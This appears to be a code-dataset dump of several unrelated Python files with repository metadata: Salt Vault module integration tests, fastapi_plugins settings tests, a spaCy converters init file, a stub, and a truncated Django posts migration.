] | null | null | null | tests/integration/modules/test_vault.py | xiaohuazi123/salt | 599966292c463667db31140d276a8db8675364e5 | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/modules/test_vault.py | xiaohuazi123/salt | 599966292c463667db31140d276a8db8675364e5 | [
"Apache-2.0",
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Integration tests for the vault execution module
"""
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import inspect
import logging
import time
# Import Salt Libs
import salt.utils.path
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest
from tests.support.paths import FILES
# Import Salt Testing Libs
from tests.support.unit import skipIf
log = logging.getLogger(__name__)
@destructiveTest
@skipIf(not salt.utils.path.which("dockerd"), "Docker not installed")
@skipIf(not salt.utils.path.which("vault"), "Vault not installed")
class VaultTestCase(ModuleCase):
"""
Test vault module
"""
count = 0
def setUp(self):
"""
SetUp vault container
"""
if self.count == 0:
config = '{"backend": {"file": {"path": "/vault/file"}}, "default_lease_ttl": "168h", "max_lease_ttl": "720h", "disable_mlock": true}'
self.run_state("docker_image.present", name="vault", tag="0.9.6")
self.run_state(
"docker_container.running",
name="vault",
image="vault:0.9.6",
port_bindings="8200:8200",
environment={
"VAULT_DEV_ROOT_TOKEN_ID": "testsecret",
"VAULT_LOCAL_CONFIG": config,
},
)
time.sleep(5)
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault login token=testsecret",
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to login to vault")
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault policy write testpolicy {0}/vault.hcl".format(
FILES
),
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to assign policy to vault")
self.count += 1
def tearDown(self):
"""
TearDown vault container
"""
def count_tests(funcobj):
return inspect.ismethod(funcobj) and funcobj.__name__.startswith("test_")
numtests = len(inspect.getmembers(VaultTestCase, predicate=count_tests))
if self.count >= numtests:
self.run_state("docker_container.stopped", name="vault")
self.run_state("docker_container.absent", name="vault")
self.run_state("docker_image.absent", name="vault", force=True)
def test_write_read_secret(self):
write_return = self.run_function(
"vault.write_secret", path="secret/my/secret", user="foo", password="bar"
)
self.assertEqual(write_return, True)
assert self.run_function("vault.read_secret", arg=["secret/my/secret"]) == {
"password": "bar",
"user": "foo",
}
assert (
self.run_function("vault.read_secret", arg=["secret/my/secret", "user"])
== "foo"
)
def test_write_raw_read_secret(self):
assert (
self.run_function(
"vault.write_raw",
path="secret/my/secret2",
raw={"user2": "foo2", "password2": "bar2"},
)
is True
)
assert self.run_function("vault.read_secret", arg=["secret/my/secret2"]) == {
"password2": "bar2",
"user2": "foo2",
}
def test_delete_secret(self):
assert (
self.run_function(
"vault.write_secret",
path="secret/my/secret",
user="foo",
password="bar",
)
is True
)
assert (
self.run_function("vault.delete_secret", arg=["secret/my/secret"]) is True
)
def test_list_secrets(self):
assert (
self.run_function(
"vault.write_secret",
path="secret/my/secret",
user="foo",
password="bar",
)
is True
)
assert self.run_function("vault.list_secrets", arg=["secret/my/"]) == {
"keys": ["secret"]
}
@destructiveTest
@skipIf(not salt.utils.path.which("dockerd"), "Docker not installed")
@skipIf(not salt.utils.path.which("vault"), "Vault not installed")
class VaultTestCaseCurrent(ModuleCase):
"""
Test vault module against current vault
"""
count = 0
def setUp(self):
"""
SetUp vault container
"""
if self.count == 0:
config = '{"backend": {"file": {"path": "/vault/file"}}, "default_lease_ttl": "168h", "max_lease_ttl": "720h", "disable_mlock": true}'
self.run_state("docker_image.present", name="vault", tag="1.3.1")
self.run_state(
"docker_container.running",
name="vault",
image="vault:1.3.1",
port_bindings="8200:8200",
environment={
"VAULT_DEV_ROOT_TOKEN_ID": "testsecret",
"VAULT_LOCAL_CONFIG": config,
},
)
time.sleep(5)
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault login token=testsecret",
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to login to vault")
ret = self.run_function(
"cmd.retcode",
cmd="/usr/local/bin/vault policy write testpolicy {0}/vault.hcl".format(
FILES
),
env={"VAULT_ADDR": "http://127.0.0.1:8200"},
)
if ret != 0:
self.skipTest("unable to assign policy to vault")
self.count += 1
def tearDown(self):
"""
TearDown vault container
"""
def count_tests(funcobj):
return inspect.ismethod(funcobj) and funcobj.__name__.startswith("test_")
numtests = len(inspect.getmembers(VaultTestCaseCurrent, predicate=count_tests))
if self.count >= numtests:
self.run_state("docker_container.stopped", name="vault")
self.run_state("docker_container.absent", name="vault")
self.run_state("docker_image.absent", name="vault", force=True)
def test_write_read_secret_kv2(self):
write_return = self.run_function(
"vault.write_secret", path="secret/my/secret", user="foo", password="bar"
)
# write_secret output:
# {'created_time': '2020-01-12T23:09:34.571294241Z', 'destroyed': False,
# 'version': 1, 'deletion_time': ''}
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
read_return = self.run_function(
"vault.read_secret", arg=["secret/my/secret"], metadata=True
)
# read_secret output:
# {'data': {'password': 'bar', 'user': 'foo'},
# 'metadata': {'created_time': '2020-01-12T23:07:18.829326918Z', 'destroyed': False,
# 'version': 1, 'deletion_time': ''}}
expected_read = {"data": {"password": "bar", "user": "foo"}}
self.assertDictContainsSubset(expected_read, read_return)
expected_read = {"password": "bar", "user": "foo"}
read_return = self.run_function("vault.read_secret", arg=["secret/my/secret"])
self.assertDictContainsSubset(expected_read, read_return)
read_return = self.run_function(
"vault.read_secret", arg=["secret/my/secret", "user"]
)
self.assertEqual(read_return, "foo")
def test_list_secrets_kv2(self):
write_return = self.run_function(
"vault.write_secret", path="secret/my/secret", user="foo", password="bar"
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
list_return = self.run_function("vault.list_secrets", arg=["secret/my/"])
self.assertIn("secret", list_return["keys"])
def test_write_raw_read_secret_kv2(self):
write_return = self.run_function(
"vault.write_raw",
path="secret/my/secret2",
raw={"user2": "foo2", "password2": "bar2"},
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
read_return = self.run_function(
"vault.read_secret", arg=["secret/my/secret2"], metadata=True
)
expected_read = {"data": {"password2": "bar2", "user2": "foo2"}}
self.assertDictContainsSubset(expected_read, read_return)
read_return = self.run_function("vault.read_secret", arg=["secret/my/secret2"])
expected_read = {"password2": "bar2", "user2": "foo2"}
self.assertDictContainsSubset(expected_read, read_return)
def test_delete_secret_kv2(self):
write_return = self.run_function(
"vault.write_secret",
path="secret/my/secret3",
user3="foo3",
password3="bar3",
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
delete_return = self.run_function(
"vault.delete_secret", arg=["secret/my/secret3"]
)
self.assertEqual(delete_return, True)
def test_destroy_secret_kv2(self):
write_return = self.run_function(
"vault.write_secret",
path="secret/my/secret4",
user3="foo4",
password4="bar4",
)
expected_write = {"destroyed": False, "deletion_time": ""}
self.assertDictContainsSubset(expected_write, write_return)
destroy_return = self.run_function(
"vault.destroy_secret", arg=["secret/my/secret4", "1"]
)
self.assertEqual(destroy_return, True)
# self.assertIsNone(self.run_function('vault.read_secret', arg=['secret/my/secret4']))
# list_return = self.run_function('vault.list_secrets', arg=['secret/my/'])
# self.assertNotIn('secret4', list_return['keys'])
| 35.989691 | 146 | 0.565454 | 1,111 | 10,473 | 5.138614 | 0.159316 | 0.046593 | 0.073568 | 0.084078 | 0.808022 | 0.779997 | 0.765283 | 0.75162 | 0.747767 | 0.725171 | 0 | 0.025519 | 0.296572 | 10,473 | 290 | 147 | 36.113793 | 0.749423 | 0.076673 | 0 | 0.577273 | 0 | 0.009091 | 0.247717 | 0.019733 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.068182 | false | 0.068182 | 0.040909 | 0.009091 | 0.136364 | 0.004545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
4e1b239089b0e0fc5489fae5e57285ea7852bc8a | 151 | py | Python | automated-competitive-programming/contest.py | dansclearov/automated-competitive-programming | 001f96a368a12a880982e0310dd3466d840577a6 | [
"MIT"
] | 1 | 2018-03-17T16:23:37.000Z | 2018-03-17T16:23:37.000Z | automated-competitive-programming/contest.py | UnlimitedUser/automated-competitive-programming | 001f96a368a12a880982e0310dd3466d840577a6 | [
"MIT"
] | null | null | null | automated-competitive-programming/contest.py | UnlimitedUser/automated-competitive-programming | 001f96a368a12a880982e0310dd3466d840577a6 | [
"MIT"
] | null | null | null | def fetch_sources(judge, contest_url_prefix): # TODO
pass
def fetch_all_tests(judge, contest_url_prefix, contest_id, sources): # TODO
pass
| 21.571429 | 76 | 0.748344 | 22 | 151 | 4.772727 | 0.545455 | 0.152381 | 0.285714 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172185 | 151 | 6 | 77 | 25.166667 | 0.84 | 0.059603 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
9d9398326d44c60b8d5e60a5c3244a36d094aa93 | 15,050 | py | Python | tests/test_settings.py | madkote/fastapi-plugins | 04d251c4c88317e1c8f35dad66771020dcb35112 | [
"MIT"
] | 211 | 2019-11-20T11:19:44.000Z | 2022-03-28T08:43:27.000Z | tests/test_settings.py | madkote/fastapi-plugins | 04d251c4c88317e1c8f35dad66771020dcb35112 | [
"MIT"
] | 16 | 2020-01-24T14:31:30.000Z | 2021-09-23T10:27:39.000Z | tests/test_settings.py | madkote/fastapi-plugins | 04d251c4c88317e1c8f35dad66771020dcb35112 | [
"MIT"
] | 12 | 2020-07-25T14:33:46.000Z | 2022-01-11T06:42:32.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# tests.test_settings
'''
:author: madkote
:contact: madkote(at)bluewin.ch
:copyright: Copyright 2021, madkote RES
tests.test_settings
-------------------
Settings tests
'''
from __future__ import absolute_import
import asyncio
import os
import unittest
import fastapi
# import pydantic
import pytest
import fastapi_plugins
from fastapi_plugins.settings import ConfigManager
from . import VERSION
from . import d2json
__all__ = []
__author__ = 'madkote <madkote(at)bluewin.ch>'
__version__ = '.'.join(str(x) for x in VERSION)
__copyright__ = 'Copyright 2021, madkote RES'
@pytest.mark.settings
class TestSettings(unittest.TestCase):
def setUp(self):
fastapi_plugins.reset_config()
fastapi_plugins.get_config.cache_clear()
def tearDown(self):
fastapi_plugins.reset_config()
fastapi_plugins.get_config.cache_clear()
def test_manager_register(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
def test_manager_reset(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
m.reset()
exp = {}
res = m._settings_map
self.assertTrue(res == exp, 'reset failed')
def test_manager_get_config(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
exp = d2json(MyConfig().dict())
res = d2json(m.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
def test_manager_get_config_default(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = fastapi_plugins.CONFIG_NAME_DEFAULT
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
exp = d2json(MyConfig().dict())
res = d2json(m.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
def test_manager_get_config_not_existing(self):
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
m = ConfigManager()
m.register(name, MyConfig)
exp = {name: MyConfig}
res = m._settings_map
self.assertTrue(res == exp, 'register failed')
try:
m.get_config()
except fastapi_plugins.ConfigError:
pass
else:
self.fail('configuration should not exist')
def test_wrap_register_config(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
fastapi_plugins.register_config(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_docker(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
# docker is default
fastapi_plugins.register_config_docker(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_DOCKER).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_local(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
fastapi_plugins.register_config_local(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_LOCAL).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_LOCAL # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_test(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
fastapi_plugins.register_config_test(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_TEST).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_TEST # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_wrap_register_config_by_name(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
fastapi_plugins.register_config(MyConfig, name=name)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_get_config(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
fastapi_plugins.register_config(MyConfig)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_get_config_by_name(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
name = 'myconfig'
fastapi_plugins.register_config(MyConfig, name=name)
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_wrap_reset_config(self):
try:
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
from fastapi_plugins.settings import _manager
exp = {}
res = _manager._settings_map
self.assertTrue(res == exp, 'reset init failed')
fastapi_plugins.register_config(MyConfig)
exp = {fastapi_plugins.CONFIG_NAME_DOCKER: MyConfig}
res = _manager._settings_map
self.assertTrue(res == exp, 'reset register failed')
fastapi_plugins.reset_config()
exp = {}
res = _manager._settings_map
self.assertTrue(res == exp, 'reset failed')
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config(self):
try:
@fastapi_plugins.registered_configuration
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed: %s != %s' % (exp, res)) # noqa E501
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_docker(self):
try:
@fastapi_plugins.registered_configuration_docker
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
# docker is default
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_DOCKER).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_local(self):
try:
@fastapi_plugins.registered_configuration_local
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_LOCAL).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_LOCAL # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_test(self):
try:
@fastapi_plugins.registered_configuration_test
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_TEST).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_TEST # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_by_name(self):
try:
name = 'myconfig'
@fastapi_plugins.registered_configuration(name=name)
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_app_config(self):
async def _test():
@fastapi_plugins.registered_configuration
class MyConfigDocker(fastapi_plugins.PluginSettings):
api_name: str = 'docker'
@fastapi_plugins.registered_configuration_local
class MyConfigLocal(fastapi_plugins.PluginSettings):
api_name: str = 'local'
app = fastapi_plugins.register_middleware(fastapi.FastAPI())
config = fastapi_plugins.get_config()
await fastapi_plugins.config_plugin.init_app(app=app, config=config) # noqa E501
await fastapi_plugins.config_plugin.init()
try:
c = await fastapi_plugins.config_plugin()
exp = d2json(MyConfigDocker().dict())
res = d2json(c.dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
await fastapi_plugins.config_plugin.terminate()
fastapi_plugins.reset_config()
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
coro = asyncio.coroutine(_test)
event_loop.run_until_complete(coro())
event_loop.close()
def test_app_config_environ(self):
async def _test():
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_LOCAL # noqa E501
try:
@fastapi_plugins.registered_configuration
class MyConfigDocker(fastapi_plugins.PluginSettings):
api_name: str = 'docker'
@fastapi_plugins.registered_configuration_local
class MyConfigLocal(fastapi_plugins.PluginSettings):
api_name: str = 'local'
app = fastapi_plugins.register_middleware(fastapi.FastAPI())
config = fastapi_plugins.get_config()
await fastapi_plugins.config_plugin.init_app(app=app, config=config) # noqa E501
await fastapi_plugins.config_plugin.init()
try:
c = await fastapi_plugins.config_plugin()
exp = d2json(MyConfigLocal().dict())
res = d2json(c.dict())
self.assertTrue(res == exp, 'get configuration failed: %s != %s' % (exp, res)) # noqa E501
finally:
await fastapi_plugins.config_plugin.terminate()
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
fastapi_plugins.reset_config()
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
coro = asyncio.coroutine(_test)
event_loop.run_until_complete(coro())
event_loop.close()
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 35.748219 | 111 | 0.606047 | 1,560 | 15,050 | 5.580769 | 0.073718 | 0.186538 | 0.060533 | 0.071215 | 0.895245 | 0.871468 | 0.842063 | 0.832874 | 0.82759 | 0.81553 | 0 | 0.009363 | 0.297475 | 15,050 | 420 | 112 | 35.833333 | 0.814055 | 0.030432 | 0 | 0.805732 | 0 | 0 | 0.068989 | 0.00158 | 0 | 0 | 0 | 0 | 0.098726 | 1 | 0.070064 | false | 0.003185 | 0.035032 | 0 | 0.178344 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9dcbf5b13d46002ec822a177b37a28035e404448 | 206 | py | Python | spacy/cli/converters/__init__.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 12 | 2019-03-20T20:43:47.000Z | 2020-04-13T11:10:52.000Z | spacy/cli/converters/__init__.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 13 | 2018-06-05T11:54:40.000Z | 2019-07-02T11:33:14.000Z | spacy/cli/converters/__init__.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 4 | 2019-06-07T13:02:33.000Z | 2021-07-07T07:34:35.000Z | from .conllu2json import conllu2json # noqa: F401
from .iob2json import iob2json # noqa: F401
from .conll_ner2json import conll_ner2json # noqa: F401
from .jsonl2json import ner_jsonl2json # noqa: F401
| 41.2 | 56 | 0.786408 | 27 | 206 | 5.888889 | 0.37037 | 0.201258 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114943 | 0.15534 | 206 | 4 | 57 | 51.5 | 0.798851 | 0.208738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9dd3288350ff48df521766dbac806f2e5c63670e | 15,342 | py | Python | backend/project/posts/migrations/0001_initial.py | winoutt/winoutt-django | f48dfd933b3c12286f973701676eb2c2ab2bff73 | [
"MIT"
] | null | null | null | backend/project/posts/migrations/0001_initial.py | winoutt/winoutt-django | f48dfd933b3c12286f973701676eb2c2ab2bff73 | [
"MIT"
] | null | null | null | backend/project/posts/migrations/0001_initial.py | winoutt/winoutt-django | f48dfd933b3c12286f973701676eb2c2ab2bff73 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-01 16:58
import datetime
from django.conf import settings
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import django_resized.forms
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('teams', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('comment_id', models.AutoField(primary_key=True, serialize=False)),
('content', models.TextField()),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Hashtag',
fields=[
('hashtag_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255, unique=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Poll',
fields=[
('poll_id', models.AutoField(primary_key=True, serialize=False)),
('question', models.CharField(max_length=255)),
('end_at', models.DateTimeField()),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='PollChoice',
fields=[
('poll_choice_id', models.AutoField(primary_key=True, serialize=False)),
('value', models.CharField(max_length=255)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('poll', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.poll')),
],
),
migrations.CreateModel(
name='Post',
fields=[
('post_id', models.AutoField(primary_key=True, serialize=False)),
('caption', models.TextField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='teams.team')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Star',
fields=[
('star_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostUnfollow',
fields=[
('post_unfollow_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostMention',
fields=[
('post_mention_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostHashtag',
fields=[
('post_hashtag_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('hashtag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.hashtag')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
],
),
migrations.CreateModel(
name='PostContent',
fields=[
('post_content_id', models.AutoField(primary_key=True, serialize=False)),
('post_content_type', models.CharField(max_length=8)),
('body', models.TextField(blank=True, null=True)),
('photo_original', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[1920, 1080], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_images/'), upload_to='')),
('cover', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[200, 200], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_covers/'), upload_to='')),
('cover_original', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[1920, 1080], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_covers/'), upload_to='')),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
